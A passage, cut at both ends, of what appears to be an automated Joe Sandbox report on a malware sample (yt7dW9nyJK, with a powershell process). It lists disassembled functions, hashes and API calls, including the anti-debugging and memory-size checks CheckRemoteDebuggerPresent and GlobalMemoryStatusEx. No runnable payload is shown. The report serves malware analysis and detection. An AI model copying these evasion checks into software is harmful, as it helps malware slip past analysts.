                                                                            control_flow_graph 376 b5aeb0-b5b960 378 b5b962-b5b965 376->378 379 b5b968-b5b997 LoadLibraryExW 376->379 378->379 380 b5b9a0-b5b9bd 379->380 381 b5b999-b5b99f 379->381 381->380
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00B5B779,00000800,00000000,00000000), ref: 00B5B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: a3d0aa2c0c703588e3d021b99379055165ae5bd0a77a53ca19ed53a00496d4cc
                                                                            • Instruction ID: aaf7b0be7c8fbaf0dc6ba4d8d2e62a81529bf4fb703a5c34b695eca276476008
                                                                            • Opcode Fuzzy Hash: a3d0aa2c0c703588e3d021b99379055165ae5bd0a77a53ca19ed53a00496d4cc
                                                                            • Instruction Fuzzy Hash: 5B11E4B69003099FDB10CF9AD484BEEFBF4EB48310F14846EE919A7200C375A945CFA5
                                                                            Function 00B5B698 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 384 b5b698-b5b6d8 385 b5b6e0-b5b70b GetModuleHandleW 384->385 386 b5b6da-b5b6dd 384->386 387 b5b714-b5b728 385->387 388 b5b70d-b5b713 385->388 386->385 388->387
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00B5B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 008c0d3084e9d5b8891f8519726f67a618c59eab67534022048938b07ce57326
                                                                            • Instruction ID: 1ed7f24e7a8ebef87e9f913f8e60d20e4b1bc31d278336b916a2fbff1a969667
                                                                            • Opcode Fuzzy Hash: 008c0d3084e9d5b8891f8519726f67a618c59eab67534022048938b07ce57326
                                                                            • Instruction Fuzzy Hash: 8811DFB6C00249CFCB10CF9AD844B9EFBF4EB88324F14845AD819A7611D379A949CFA1
                                                                            Function 0094D3D8 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6323594d54b62e9efebf9a44bb9ff2dff5bfbab86f1eca25cf6b6391ebf7aefc
                                                                            • Instruction ID: a6f7a1fbe4d9980668c667fe0f06467696581a4846456c1f5ebff2d003c95fb2
                                                                            • Opcode Fuzzy Hash: 6323594d54b62e9efebf9a44bb9ff2dff5bfbab86f1eca25cf6b6391ebf7aefc
                                                                            • Instruction Fuzzy Hash: 7F212C79505204DFDB05DF14D9C0F26BF69FB98324F24C56DE9090B2A6C33AE856C7A1
                                                                            Function 0094D4C4 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e616c9bc17d3d0915ccd07df7b54f33d807a5cab26bb91bd3a1b24bdaa5487b9
                                                                            • Instruction ID: d6a69160f7dbfc9121911e19e6d8def16c9f6785ef35aef914b9d266252d5a44
                                                                            • Opcode Fuzzy Hash: e616c9bc17d3d0915ccd07df7b54f33d807a5cab26bb91bd3a1b24bdaa5487b9
                                                                            • Instruction Fuzzy Hash: 3C212579604240DFDB15DF14D9C0F26BF65FB98328F24C969E9090B25AC73AD816CAA1
                                                                            Function 0095D1D4 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f573f248578920905949a83a4de011507fa1cbf8d2b610294776454f7cbaae09
                                                                            • Instruction ID: dec424819c07c172151513765cf118803d813a6bad1b3e8d7374eac7b78307d8
                                                                            • Opcode Fuzzy Hash: f573f248578920905949a83a4de011507fa1cbf8d2b610294776454f7cbaae09
                                                                            • Instruction Fuzzy Hash: 8B210471505200EFDB25DF15D9C0B26BBA5FB88315F24C96DEC094B296C33AD84ACB61
                                                                            Function 0095D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4473637752ba48fe08f50a1da548b6efc40a18f1e681453c819fd0d116127020
                                                                            • Instruction ID: fd511169231fbd8344813e067319dc45655fec643202f7379937a8a003507306
                                                                            • Opcode Fuzzy Hash: 4473637752ba48fe08f50a1da548b6efc40a18f1e681453c819fd0d116127020
                                                                            • Instruction Fuzzy Hash: A021F275604200DFDB25DF24D9C4B26BB65EB88325F24C96DDC0A4B296C33AD80BCB61
                                                                            Function 0095D005 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d2e136bbdc3dcb5a113cc01a0097460ade263ec4b1e5886f80860b664984d651
                                                                            • Instruction ID: 70dc06bef5f268da648fd3dedef70f7f9d54157794d664790565f1ef3cc4b379
                                                                            • Opcode Fuzzy Hash: d2e136bbdc3dcb5a113cc01a0097460ade263ec4b1e5886f80860b664984d651
                                                                            • Instruction Fuzzy Hash: C52181755093C08FDB16CF24D994B15BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                                                            Function 0094D3D3 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: bff9efac8f98e0615355f4767375f454afaf4435ed17f45ed864532d210bd2c9
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 6411E67A504240DFDB16CF14D5C4B16BF72FB94324F24C6A9D9090B6A6C33AE85ACBA1
                                                                            Function 0094D4BF Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 65300ab5239bd3985655b59cec3770c92acf5b2b5f7529e3c655f3bae67cdd6b
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: E311E676504280CFDB16CF14D5C4F16BF71FB94324F24C6A9E8494B65AC33AD85ACBA1
                                                                            Function 0095D1CF Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067764268.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_95d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 8b3e0072c953a0aa4324dc6c0de111292c0d707a543396975095fcb20ea15dc7
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: 9E118B75505280DFDB16CF14D5C4B15BBA1FB84314F24C6ADDC494B696C33AD84ACB61
                                                                            Function 0094D759 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 576a1af08675071cab34cf812e41d293527e2380b4d5ee43d61c333cffa0f646
                                                                            • Instruction ID: ea892c33cef53004302320594155f85191c97e6521f7512ec2541f4cdf6344ed
                                                                            • Opcode Fuzzy Hash: 576a1af08675071cab34cf812e41d293527e2380b4d5ee43d61c333cffa0f646
                                                                            • Instruction Fuzzy Hash: E201A2B51063449AE7219B69CD84F66BFACEF52734F28C95AED090A287C3799840C6B1
                                                                            Function 0094D758 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2067680700.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_94d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f9095ed6265f5d99e2638dc452b3d5d5f1655d9ab2a5ef028cfdb805fbb855b
                                                                            • Instruction ID: a7f16e6e65eec6c0e3a3c7d4caceb83e0c925e30ff94bc5d4995ee2533bbcc1f
                                                                            • Opcode Fuzzy Hash: 8f9095ed6265f5d99e2638dc452b3d5d5f1655d9ab2a5ef028cfdb805fbb855b
                                                                            • Instruction Fuzzy Hash: D3F062764053449EE7208B56DD84B62FFACEF51734F18C45AED085A287C3799844CAB1

                                                                            Non-executed Functions

                                                                            Function 00B5E2CC Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2068165273.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_b50000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a27a8156a1417909e91fdc964a107b741d0f4a3625eb415a4dbb8cb6ece5cfc0
                                                                            • Instruction ID: ac62652c6e774c343bfe8c1111ba35f9b9613c909e41d0ba902bfdbf41172d93
                                                                            • Opcode Fuzzy Hash: a27a8156a1417909e91fdc964a107b741d0f4a3625eb415a4dbb8cb6ece5cfc0
                                                                            • Instruction Fuzzy Hash: D2A14F32A006068FCF0ADFB5C844AAEB7F2FF85301B1545FAE815AB265DB31D959CB40

                                                                            Execution Graph

                                                                            Execution Coverage:15.1%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:39
                                                                            Total number of Limit Nodes:4
                                                                            execution_graph 15616 2a9ca30 15619 2a9ca34 15616->15619 15620 2a9f828 15619->15620 15625 2a9f710 15619->15625 15622 2a9f7ff 15620->15622 15621 2a9f826 15621->15619 15622->15621 15630 2a9fa08 15622->15630 15635 2a9fa18 15622->15635 15626 2a9f74c 15625->15626 15627 2a9f826 15626->15627 15628 2a9fa08 GlobalMemoryStatusEx 15626->15628 15629 2a9fa18 GlobalMemoryStatusEx 15626->15629 15627->15619 15628->15626 15629->15626 15631 2a9fa12 15630->15631 15640 6570798 15631->15640 15644 6570788 15631->15644 15632 2a9fb1d 15632->15632 15636 2a9fa31 15635->15636 15638 6570798 GlobalMemoryStatusEx 15636->15638 15639 6570788 GlobalMemoryStatusEx 15636->15639 15637 2a9fb1d 15637->15637 15638->15637 15639->15637 15641 65707ad 15640->15641 15642 6570a49 15641->15642 15648 6571288 15641->15648 15642->15632 15645 65707ad 15644->15645 15646 6570a49 15645->15646 15647 6571288 GlobalMemoryStatusEx 15645->15647 15646->15632 15647->15646 15649 657128e 15648->15649 15653 6571498 15649->15653 15656 6571488 15649->15656 15650 657131e 15650->15642 15660 65714c1 15653->15660 15654 65714a6 15654->15650 15657 6571499 15656->15657 15658 65714a6 15657->15658 15659 65714c1 GlobalMemoryStatusEx 15657->15659 15658->15650 15659->15658 15661 65714ca 15660->15661 15662 65714dd 15660->15662 15661->15662 15663 65715ee GlobalMemoryStatusEx 15661->15663 15662->15654 15664 657161e 15663->15664 15664->15654

                                                                            Executed Functions

                                                                            Function 02A91DF4 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 02A9AD57
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4511972409.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2a90000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: 64dac9f8694967eb1b3815e3e7926f9c69c178d8ec0a7756e05b7de51102eaaa
                                                                            • Instruction ID: 46f7449c77ce63bf9db124c197e0426f945194b4faf753d90d17469fa961209d
                                                                            • Opcode Fuzzy Hash: 64dac9f8694967eb1b3815e3e7926f9c69c178d8ec0a7756e05b7de51102eaaa
                                                                            • Instruction Fuzzy Hash: 4F2136B28006598FDB10CF9AD984BEEBBF4FF49310F14846AE459B7251D778A944CFA0
                                                                            Function 065714C1 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0657160F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4540504029.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6570000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 24876b7853647b3cfb087aa24aa2587748d01ee2b75bc602909720247371f985
                                                                            • Instruction ID: 6bc4b35464407cea0f533ff7ca5ff2a28170a86575ae46639ba734f6ffa88d35
                                                                            • Opcode Fuzzy Hash: 24876b7853647b3cfb087aa24aa2587748d01ee2b75bc602909720247371f985
                                                                            • Instruction Fuzzy Hash: 874126B2D047558FCB15CFB9D8402AEBFF5FF89210F09856AD445E7281DB388945CBA0
                                                                            Function 02A9ACDB Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 02A9AD57
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4511972409.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2a90000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: 5ca0a64be77808c9a853f854b3795057fd7c2d2b1720ba0b66b0e66f4f02ab0d
                                                                            • Instruction ID: 4e5ec86ee543bd266c38e4ef0635f84603eb1ec8564ea2c6e08a3139163b2a04
                                                                            • Opcode Fuzzy Hash: 5ca0a64be77808c9a853f854b3795057fd7c2d2b1720ba0b66b0e66f4f02ab0d
                                                                            • Instruction Fuzzy Hash: DA2125B6800259CFDB10CF9AD984BEEBBF4EF49320F14845AE459B7251D738AA44CF60
                                                                            Function 065715A8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0657160F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4540504029.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6570000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 304e3101b49f813864a54811ea4c5231139a0c8393b72774cb2fefacab5cc02c
                                                                            • Instruction ID: 3b78758b3dfab7a4b77bfd02e52502a2773d96494045b04332bdaa3279e7776d
                                                                            • Opcode Fuzzy Hash: 304e3101b49f813864a54811ea4c5231139a0c8393b72774cb2fefacab5cc02c
                                                                            • Instruction Fuzzy Hash: D111F6B1C0065A9BDB10CF9AD944BDEFBF4FF48720F14816AD818A7241D778A944CFA5
                                                                            Function 0103D528 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4509452605.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_103d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8617ba5ed438b3485dbb828416823e3fb189399853e798ba400413c6579999ad
                                                                            • Instruction ID: ac4879eb2d8669c9f4aa3e6f5ed2bec3546cecddd67335ab0845ab3398ed13f5
                                                                            • Opcode Fuzzy Hash: 8617ba5ed438b3485dbb828416823e3fb189399853e798ba400413c6579999ad
                                                                            • Instruction Fuzzy Hash: 87214C71504240DFDB06DF58D9C0B26BFA9FBD8328F64C5ADE9490B286C336D456C7A1
                                                                            Function 0103D523 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4509452605.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_103d000_yt7dW9nyJK.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: ef752ad1c5906c33979f0e959967d2fa5afe617a25a7365278f13cadb2e5fd03
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: B1110376404280CFCB02CF54D5C4B16BFB2FB84324F24C5A9D8490B257C33AD45ACBA1

                                                                            Executed Functions

                                                                            Function 033AB490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: {Yxo^$Yxo^
                                                                            • API String ID: 0-3563231153
                                                                            • Opcode ID: 18669c5aafaf55219d3dd9aa9af87234e73e45d7ac28d5adc738685eb38922c9
                                                                            • Instruction ID: a9c965f5c52eebaa3d34bc3771ebab23dabb232e8f85dde851c4e78df4da4d5a
                                                                            • Opcode Fuzzy Hash: 18669c5aafaf55219d3dd9aa9af87234e73e45d7ac28d5adc738685eb38922c9
                                                                            • Instruction Fuzzy Hash: 04916C75F00B185BDB19EBB889506AEB7A2EFC4700B40C92ED116AF358DF3859068BD5
                                                                            Function 07962308 Relevance: 20.7, Strings: 16, Instructions: 652COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$pij$pij$pij$pij$pij$|,j$J!l$J!l$J!l$J!l$J!l$J!l$r l$r l
                                                                            • API String ID: 0-1074802320
                                                                            • Opcode ID: 636013aea3ce312a6319d9774377f9823f89c5152b14759837c04a8d98a62fae
                                                                            • Instruction ID: 14a34fca84d0a8282716df742cad8ff283136746f3a1b7b0fcc2c06f5b9fc0ad
                                                                            • Opcode Fuzzy Hash: 636013aea3ce312a6319d9774377f9823f89c5152b14759837c04a8d98a62fae
                                                                            • Instruction Fuzzy Hash: A2225AB1B0420A8FCF219F68844966ABBE5FF85318F1485BBE905DF292DB34DD41C7A1
                                                                            Function 07963CE8 Relevance: 5.6, Strings: 4, Instructions: 590COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$4'cq$4'cq
                                                                            • API String ID: 0-1446110543
                                                                            • Opcode ID: 188ce8647db719d09b576b0a12de5cb0e0ec26a1d3b7a35202ebe4eecd074912
                                                                            • Instruction ID: a0639bd7b53ed517408de91da32865b6d369298f20ac2e00c87c3a43c2214244
                                                                            • Opcode Fuzzy Hash: 188ce8647db719d09b576b0a12de5cb0e0ec26a1d3b7a35202ebe4eecd074912
                                                                            • Instruction Fuzzy Hash: 6F1289F1B002558FCB169BA8880576BBBB69FD2318F14C67BD905CF2A2DB35C941C7A1
                                                                            Function 033A6FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (gq
                                                                            • API String ID: 0-1972435379
                                                                            • Opcode ID: 4a15284de69bd8b4f419af19fbc08c3cb3962385033f9ca0dd6ef6b88ee4d6fb
                                                                            • Instruction ID: bf48f5744001861d677e89d86c0555c11f6f55cfb6679619bc1046db2f1002b5
                                                                            • Opcode Fuzzy Hash: 4a15284de69bd8b4f419af19fbc08c3cb3962385033f9ca0dd6ef6b88ee4d6fb
                                                                            • Instruction Fuzzy Hash: C2414C34B042048FDB15DBA8C8D8AAEBBF5EF8D315F188498D442AB391DB35DC01DB60
                                                                            Function 033AAF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (&cq
                                                                            • API String ID: 0-298851153
                                                                            • Opcode ID: bcb1e88f3349902be8e5e9247dfd475e39829f3b2aeed9ae1522bf074f95f23c
                                                                            • Instruction ID: d60886779f845ae032390d083e438aa046a7ef529ead64b7a152a68c349c0704
                                                                            • Opcode Fuzzy Hash: bcb1e88f3349902be8e5e9247dfd475e39829f3b2aeed9ae1522bf074f95f23c
                                                                            • Instruction Fuzzy Hash: C621B275A046588FCB24DFAED84069EFBF5EF89320F14846AD419E7340CB759805CBE5
                                                                            Function 033ADC88 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +/xo^
                                                                            • API String ID: 0-900678728
                                                                            • Opcode ID: fa6b6566cbd6891c33306220c4ce9192bfe1f97da826977b6a6b9a8db28095bd
                                                                            • Instruction ID: 1196623a200c86a20e1e278d17fa038e6e79eac73a1302b50fd5c397726de053
                                                                            • Opcode Fuzzy Hash: fa6b6566cbd6891c33306220c4ce9192bfe1f97da826977b6a6b9a8db28095bd
                                                                            • Instruction Fuzzy Hash: 7DF0F63A645E446F8B16E61DA8B08EEBB6EDEC56B13444457E40ACFE02DB60480443F5
                                                                            Function 033ADC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +/xo^
                                                                            • API String ID: 0-900678728
                                                                            • Opcode ID: baba2013889c8fcf5b44e8ee84c14e038d1d5d2a8e07166e65178c18e207da4f
                                                                            • Instruction ID: c82bbf04e80718a90776beaf4e34dd3a26b75bb503f2c0c07a0b2e3fc8ea0dba
                                                                            • Opcode Fuzzy Hash: baba2013889c8fcf5b44e8ee84c14e038d1d5d2a8e07166e65178c18e207da4f
                                                                            • Instruction Fuzzy Hash: 86E0C239740A140B8716E61EA86089F77EADFC5672354842EF11ACB740EF64DC0587D5
                                                                            Function 033A29F0 Relevance: .2, Instructions: 207COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be3ee6773f3db151fd61efb8f051a2cdd152a867d24df503f794b2cbae65b739
                                                                            • Instruction ID: 79db76b927e74e9f1cbda33d12999ea8cbbd1cb5f0e256e4a192b7cbb90d4be5
                                                                            • Opcode Fuzzy Hash: be3ee6773f3db151fd61efb8f051a2cdd152a867d24df503f794b2cbae65b739
                                                                            • Instruction Fuzzy Hash: B2912874A006058FCB15CF9CC4D49AAFBB6FF88310B288699D955EB3A5C736EC51CB90
                                                                            Function 033A7740 Relevance: .2, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
